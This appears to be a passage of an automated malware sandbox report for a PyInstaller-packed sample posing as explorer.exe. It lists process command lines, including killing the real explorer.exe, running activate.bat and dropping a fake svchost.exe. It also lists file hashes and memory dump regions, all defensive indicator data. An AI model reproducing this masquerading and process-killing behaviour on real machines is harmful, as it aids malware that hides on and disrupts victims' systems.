C:\Users\Admin\AppData\Local\Temp\explorer.exe
"C:\Users\Admin\AppData\Local\Temp\explorer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\activate.bat
C:\Windows\system32\taskkill.exe
taskkill /f /im "explorer.exe"
C:\Users\Admin\explorer.exe
"explorer.exe"
C:\Users\Admin\explorer.exe
"explorer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\explorer.exe
| MD5 | 92d05b3c86fe82d20e3eac753053a6a7 |
| SHA1 | bbbc090d9b69fa17bb19c6525288f7b1246eaca6 |
| SHA256 | 990d921f213ecebf5e06bd1a12549fbfb4840e1f8078884792d7ad381bfa79ff |
| SHA512 | 24b16cb38666d70aa52678118849ef01b24697ee53e24dbb3b43ce7aab7bdba315ddc0a91a3cae0116368de098db9bfc1fc30251451020f5fde251a9d82b130e |
C:\Users\Admin\AppData\Local\svchost.exe
| MD5 | 8a6f1580a5b9b94d7cd47cc6b1af1b9a |
| SHA1 | e68768afd59e18091d345cb300e859572e8d4c5c |
| SHA256 | bb1464e75c750d90c0c49d148c9e64eefe0c29b2f670d708c8085ddd3104dbfe |
| SHA512 | 1663a9e0868b3f5d7e1edd30259024e419c2d190ec8c31e76e66aef0c8a0e02da0c829584214b9e2f76cbd349a53bf77d01d03e9b0e9c8a99eb18021b1d53309 |
C:\Users\Admin\AppData\Local\Temp\explorer.exe
| MD5 | 05e0eae62faa65e341349723a7b83e52 |
| SHA1 | e3ef964fbf77100ee158b78e17d22f75bef689af |
| SHA256 | 8bfa320e20a0bc4f239e84cec74e27b53b18775b6a77c3391c21ba0796e5ffc1 |
| SHA512 | 366d3aa5a49d0513502b978d58403d1d3a3d16434b17b3064045d9ab3985e3752e42274b00877133326154743cab041b879d6855baf353eb97ba9f635256175f |
C:\Users\Admin\AppData\Local\Temp\explorer.exe
| MD5 | 5f18268da5ba8a5f7fa9bdda6c1e873a |
| SHA1 | 19714031d17d89ae4aed7e7bf2ff68e3d8ccfb1b |
| SHA256 | c3853747e6e8f091f1c0808a16b217382c6710f3ad582722c6988fb1e9515090 |
| SHA512 | 81e10f14d2ddc40deb0eea55983b5c1fb206d64e5f451e8fd315034a824d4105b96c6e4a9cb972fdcc62875fe3b4408a3cb773628d67c453cc8af1e9cd6ab192 |
memory/2660-30-0x0000000000320000-0x000000000038D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI48442\python310.dll
| MD5 | 8f7a80754f894ae011141cd9c7228f96 |
| SHA1 | 0490f281cdf2bca0906b287eb64bdb0d6f8f16bd |
| SHA256 | dc3fa53a032575b3b377a56c4ad42e95e6efee27e6b30f88888531cd904d0a7f |
| SHA512 | e4047b1047e4dae0589a869ed77ffb9a4df052742d59bbdfa3f2ed0d8282326a9c173a59d9b7e0000f42e98d37682d21ee45d8db85ae82efd4f4d064dc79c73f |
C:\Users\Admin\AppData\Local\Temp\explorer.exe
| MD5 | 18b5595401dc0d358d90a3c4133b9bde |
| SHA1 | 22ecf357907489c4c3217267cea3006c76920dd8 |
| SHA256 | 7c21e7f20bb7e0a41296722c2a75ca450a22582bc47de1b46fe9f78e301b9dbc |
| SHA512 | 2afef0a91a1493c6eeeec7036504a2d4974392c9e80fe1c5b1bc92899c321772d2d9b2ac470621bccc871ff0b04e68878b1902369f339550686bfd90b54741bf |
C:\Users\Admin\AppData\Local\Temp\_MEI48442\python310.dll
| MD5 | ebcfea22527a371fd59bf9c67b07fa4e |
| SHA1 | d0860c1eb4d6644b0e0c24573a0c49dbfa4a56ad |
| SHA256 | 4bec88b5e1ef731689504d5caca04df7e2550e6814f1815b4ecfa3bcad01ca2f |
| SHA512 | d21d345148fbbb664a1ebff0f73f435e2cca5a3d8eb3698398ae2724b9133dd4253343d5addb703b9a781fde5cde66c97c601f0cee6f9e055563f280069d503b |
C:\Users\Admin\AppData\Local\Temp\_MEI48442\VCRUNTIME140.dll
| MD5 | f34eb034aa4a9735218686590cba2e8b |
| SHA1 | 2bc20acdcb201676b77a66fa7ec6b53fa2644713 |
| SHA256 | 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1 |
| SHA512 | d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af |
memory/4468-38-0x0000000072FA0000-0x0000000073751000-memory.dmp
memory/1724-40-0x00007FFE5F840000-0x00007FFE5FCA6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI48442\_ctypes.pyd
| MD5 | 48ce90022e97f72114a95630ba43b8fb |
| SHA1 | f2eba0434ec204d8c6ca4f01af33ef34f09b52fd |
| SHA256 | 5998de3112a710248d29df76a05272775bf08a8dbc5a051a7ecb909fef069635 |
| SHA512 | 7e6c2591805136f74c413b9633d5fdc4428e6f01e0e632b278bee98170b4f418ef2afd237c09e60b0e72076924ed0e3ffb0e2453e543b5e030b263f64568fab8 |
C:\Users\Admin\AppData\Local\Temp\_MEI48442\libffi-7.dll
| MD5 | 6f818913fafe8e4df7fedc46131f201f |
| SHA1 | bbb7ba3edbd4783f7f973d97b0b568cc69cadac5 |
| SHA256 | 3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56 |
| SHA512 | 5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639 |
C:\Users\Admin\AppData\Local\Temp\_MEI48442\_socket.pyd
| MD5 | 0dd957099cf15d172d0a343886fb7c66 |
| SHA1 | 950f7f15c6accffac699c5db6ce475365821b92a |
| SHA256 | 8142d92dc7557e8c585ea9ee41146b77864b7529ed464fdf51dfb6d797828a4a |
| SHA512 | 3dc0380dfc871d8cab7e95d6119f16be2f31cdde784f8f90ffddd6a43323a2988c61e343eede5e5cb347fc2af594fe8d8944644396faf2e478a3487bcf9cf9ee |
C:\Users\Admin\AppData\Local\Temp\_MEI48442\_lzma.pyd
| MD5 | 7c66f33a67fbb4d99041f085ef3c6428 |
| SHA1 | e1384891df177b45b889459c503985b113e754a3 |
| SHA256 | 32f911e178fa9e4db9bd797598f84f9896f99e5022f2b76a1589b81f686b0866 |
| SHA512 | d0caabd031fa0c63f4cfb79d8f3531ad85eda468d77a78dd3dde40ce9ac2d404fc0099c4f67579aa802fe5c6c6a464894fd88c19f1fc601f26189780b36f3f9d |
memory/1724-65-0x00007FFE71C60000-0x00007FFE71C8C000-memory.dmp
memory/4468-64-0x0000000004C70000-0x000000000529A000-memory.dmp
memory/4468-66-0x00000000045F0000-0x0000000004600000-memory.dmp
memory/1724-67-0x00007FFE71C90000-0x00007FFE71CA8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI48442\_bz2.pyd
| MD5 | f6e387f20808828796e876682a328e98 |
| SHA1 | 6679ae43b0634ac706218996bac961bef4138a02 |
| SHA256 | 8886bd30421c6c6bfae17847002b9bf4ee4d9eee1a3be7369ee66b36e26c372b |
| SHA512 | ad7cf281f2d830f9dbf66d8ef50e418b4a17a0144b6616c43d7e98b00e6f0cbafc6fe4aba4fabf2f008bb0df85553614b38ae303e5726621a804051d950e744e |
memory/1724-55-0x00007FFE75420000-0x00007FFE7542F000-memory.dmp
C:\Users\Admin\activate.bat
| MD5 | fbcbd43fa00e29f002495e4ab2dc4782 |
| SHA1 | 75aad7a3fa21226bf37ff89da953743d2b650dc0 |
| SHA256 | 7a58a034c76b65053744b7d2a443e487e1993aab50642a62f7f388d223e5f648 |
| SHA512 | 4f26971331fbe1d40e65d493f9417ebcca5e331b61285da2575629b7cd57bdb35ec480cf3ef9a1df48c949360ba9038797575a6181d79b52e1092e4f98bebb3e |
memory/4468-58-0x00000000045F0000-0x0000000004600000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI48442\_hashlib.pyd
| MD5 | 13f99120a244ab62af1684fbbc5d5a7e |
| SHA1 | 5147a90082eb3cd2c34b7f2deb8a4ef24d7ae724 |
| SHA256 | 11658b52e7166da976abeeed78a940d69b2f11f518046877bea799759a17f58b |
| SHA512 | 46c2f9f43df6de72458ed24c2a0433a6092fd5b49b3234135f06c19a80f18f8bdbfb297e5a411cf29f8c60af342c80db123959f7317cfa045c73bd6f835eb22d |
memory/4468-69-0x0000000004C10000-0x0000000004C32000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI48442\_decimal.pyd
| MD5 | 2030438e4f397a7d4241a701a3ca2419 |
| SHA1 | 28b8d06135cd1f784ccabda39432cc83ba22daf7 |
| SHA256 | 07d7ac065f25af2c7498d5d93b1551cc43a4d4b5e8fb2f9293b647d0f7bd7c72 |
| SHA512 | 767f2a9f9eef6ebeca95ab9652b7d0976f2ac87b9e9da1dbd3c4ccf58e8ecb0da8242f4df0b07612282c16ba85197ed0296d1052027cd48b96d61bdf678abaad |
C:\Users\Admin\AppData\Local\Temp\_MEI48442\unicodedata.pyd
| MD5 | dfa1f0cd0ad295b31cb9dda2803bbd8c |
| SHA1 | cc68460feae2ff4e9d85a72be58c8011cb318bc2 |
| SHA256 | 46a90852f6651f20b7c89e71cc63f0154f00a0e7cd543f046020d5ec9ef6cb10 |
| SHA512 | 7fbdfd56e12c8f030483f4d033f1b920968ea87687e9896f418e9cf1b9e345e2be2dc8f1ea1a8afb0040a376ffb7a5dc0db27d84fb8291b50e2ed3b10c10168e |
C:\Users\Admin\AppData\Local\Temp\_MEI48442\select.pyd
| MD5 | 5c66bcf3cc3c364ecac7cf40ad28d8f0 |
| SHA1 | faf0848c231bf120dc9f749f726c807874d9d612 |
| SHA256 | 26dada1a4730a51a0e3aa62e7abc7e6517a4dc48f02616e0b6e5291014a809cc |
| SHA512 | 034cd4c70c4e0d95d6bb3f72751c07b8b91918aabe59abf9009c60aa22600247694d6b9e232fefff78868aad20f5f5548e8740659036096fab44b65f6c4f8db6 |
memory/4468-70-0x0000000005510000-0x0000000005576000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI48442\libcrypto-1_1.dll
| MD5 | e5aecaf59c67d6dd7c7979dfb49ed3b0 |
| SHA1 | b0a292065e1b3875f015277b90d183b875451450 |
| SHA256 | 9d2257d0de8172bcc8f2dba431eb91bd5b8ac5a9cbe998f1dcac0fac818800b1 |
| SHA512 | 145eaa969a1a14686ab99e84841b0998cf1f726709ccd177acfb751d0db9aa70006087a13bf3693bc0b57a0295a48c631d0b80c52472c97ebe88be5c528022b4 |
memory/4468-71-0x0000000005580000-0x00000000055E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zni5obkb.sef.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1724-46-0x00007FFE71CB0000-0x00007FFE71CD4000-memory.dmp
memory/4468-80-0x00000000055F0000-0x0000000005947000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI48442\base_library.zip
| MD5 | 483d9675ef53a13327e7dfc7d09f23fe |
| SHA1 | 2378f1db6292cd8dc4ad95763a42ad49aeb11337 |
| SHA256 | 70c28ec0770edefcef46fa27aaa08ba8dc22a31acd6f84cb0b99257dca1b629e |
| SHA512 | f905eb1817d7d4cc1f65e3a5a01bade761bca15c4a24af7097bc8f3f2b43b00e000d6ea23cd054c391d3fdc2f1114f2af43c8bb6d97c1a0ce747763260a864f5 |
memory/4468-39-0x0000000004600000-0x0000000004636000-memory.dmp
memory/1724-81-0x00007FFE5F840000-0x00007FFE5FCA6000-memory.dmp
memory/1724-82-0x00007FFE71CB0000-0x00007FFE71CD4000-memory.dmp
memory/4468-86-0x0000000005AB0000-0x0000000005ACE000-memory.dmp
memory/4468-87-0x0000000006020000-0x000000000606C000-memory.dmp
C:\Users\Admin\explorer.exe
| MD5 | 228656d0d4450a0e55015435fb512f6c |
| SHA1 | e369cbc44c4c6e6a9c65fd2798e032f2bfe28ac2 |
| SHA256 | f48199ccbd562d650e3bc20a9fb25a66e9b4d8b32db6946ba2da4dfb8b135a82 |
| SHA512 | a644398c9432172dce13de87d10b3a3be897eaf1331cb7f30ea4b2a67f29e8521179fd15292c2254c966596306e308844611507f28828b9a894e58ac3d18e944 |
C:\Users\Admin\explorer.exe
| MD5 | 9f54ef8b4bad0a3a717e098e9ebba153 |
| SHA1 | bb34a2897eccb4542b27e4eb28c082b2657ec706 |
| SHA256 | f2200600da19b87fdc81d75d9b99ed2057f8894ed4edd8f51cfa87dcdc55ebe4 |
| SHA512 | 3c74f71c9ff5bb5c6b48d60dd13f7fc4bd6463474988580505ad27e58d7ce50d05b56f5530c52a8263695f389ed4dc1c64433e304e64513a6483538c0653e8de |
C:\Users\Admin\explorer.exe
| MD5 | ad31f02d0d8284ac9c9e1591400afd86 |
| SHA1 | b588338ae1b40f5dc734830aec21604cb4105fac |
| SHA256 | eb1833ea819ab084ab9fd3ea1db39dca20a59fdd3e983476dcc9b40cd013de7c |
| SHA512 | fba99be00b2c58bf419013c93c74db9ac3df2cf00ed91ffeff40c38761588649d5497025d76bac77646e0c66f53800d6e336f6463f267633ffc4328abbc34b45 |
C:\Users\Admin\AppData\Local\Temp\_MEI16202\python310.dll
| MD5 | 3f782cf7874b03c1d20ed90d370f4329 |
| SHA1 | 08a2b4a21092321de1dcad1bb2afb660b0fa7749 |
| SHA256 | 2a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6 |
| SHA512 | 950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857 |
memory/4352-109-0x00007FFE684B0000-0x00007FFE68916000-memory.dmp
memory/4352-124-0x00007FFE7B010000-0x00007FFE7B01F000-memory.dmp
memory/4352-127-0x00007FFE771E0000-0x00007FFE771F8000-memory.dmp
memory/4352-123-0x00007FFE77200000-0x00007FFE77224000-memory.dmp
memory/4352-130-0x00007FFE771B0000-0x00007FFE771DC000-memory.dmp
memory/4352-131-0x00007FFE75810000-0x00007FFE7581D000-memory.dmp
memory/4352-133-0x00007FFE770F0000-0x00007FFE77109000-memory.dmp
memory/4468-132-0x00000000045F0000-0x0000000004600000-memory.dmp
memory/4468-134-0x0000000006A90000-0x0000000006AC4000-memory.dmp
memory/4468-135-0x00000000744B0000-0x00000000744FC000-memory.dmp
memory/2660-136-0x0000000004200000-0x0000000004600000-memory.dmp
memory/4468-145-0x0000000004910000-0x000000000492E000-memory.dmp
memory/2660-146-0x0000000004200000-0x0000000004600000-memory.dmp
memory/2660-148-0x0000000004200000-0x0000000004600000-memory.dmp
memory/4468-147-0x0000000006AD0000-0x0000000006B74000-memory.dmp
memory/2660-149-0x00007FFE80620000-0x00007FFE80829000-memory.dmp
memory/2660-150-0x0000000000320000-0x000000000038D000-memory.dmp
memory/2660-152-0x0000000004200000-0x0000000004600000-memory.dmp
memory/2660-153-0x0000000075620000-0x0000000075872000-memory.dmp
memory/3428-154-0x00000000005F0000-0x00000000005F9000-memory.dmp
memory/2660-155-0x00007FFE80620000-0x00007FFE80829000-memory.dmp
memory/4468-157-0x0000000007450000-0x0000000007ACA000-memory.dmp
memory/3428-160-0x0000000002550000-0x0000000002950000-memory.dmp
memory/4468-159-0x0000000006E00000-0x0000000006E1A000-memory.dmp
memory/3428-161-0x00007FFE80620000-0x00007FFE80829000-memory.dmp
memory/3428-158-0x0000000002550000-0x0000000002950000-memory.dmp
memory/3428-163-0x0000000075620000-0x0000000075872000-memory.dmp
memory/4468-164-0x0000000072FA0000-0x0000000073751000-memory.dmp
memory/3428-165-0x0000000002550000-0x0000000002950000-memory.dmp
memory/3428-166-0x00007FFE80620000-0x00007FFE80829000-memory.dmp
memory/4468-167-0x0000000006080000-0x000000000608A000-memory.dmp
memory/3428-168-0x0000000002550000-0x0000000002950000-memory.dmp
memory/4468-169-0x00000000070B0000-0x0000000007146000-memory.dmp
memory/4468-170-0x0000000007010000-0x0000000007021000-memory.dmp
memory/4468-171-0x0000000007050000-0x000000000705E000-memory.dmp
memory/4468-172-0x0000000007060000-0x0000000007075000-memory.dmp
memory/4468-173-0x0000000007150000-0x000000000716A000-memory.dmp
memory/4468-174-0x00000000070A0000-0x00000000070A8000-memory.dmp
memory/4468-177-0x0000000072FA0000-0x0000000073751000-memory.dmp
memory/4352-178-0x00007FFE684B0000-0x00007FFE68916000-memory.dmp
memory/4352-179-0x00007FFE77200000-0x00007FFE77224000-memory.dmp
memory/4352-185-0x00007FFE684B0000-0x00007FFE68916000-memory.dmp
memory/4352-186-0x00007FFE684B0000-0x00007FFE68916000-memory.dmp
memory/4352-193-0x00007FFE684B0000-0x00007FFE68916000-memory.dmp
memory/4352-200-0x00007FFE684B0000-0x00007FFE68916000-memory.dmp
memory/4352-207-0x00007FFE684B0000-0x00007FFE68916000-memory.dmp
memory/4352-214-0x00007FFE684B0000-0x00007FFE68916000-memory.dmp
memory/4352-221-0x00007FFE684B0000-0x00007FFE68916000-memory.dmp
memory/4352-228-0x00007FFE684B0000-0x00007FFE68916000-memory.dmp